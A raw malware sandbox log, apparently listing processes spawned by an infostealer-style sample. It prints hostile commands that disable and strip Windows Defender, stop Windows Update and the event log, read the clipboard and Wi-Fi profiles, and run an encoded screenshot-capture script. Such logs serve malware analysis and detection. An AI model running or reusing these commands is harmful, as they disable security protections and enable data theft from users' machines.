JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess created: C:\Users\user\AppData\Local\Temp\instals.exe "C:\Users\user\AppData\Local\Temp\instals.exe" Jump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NPYIAYNC"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NPYIAYNC"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
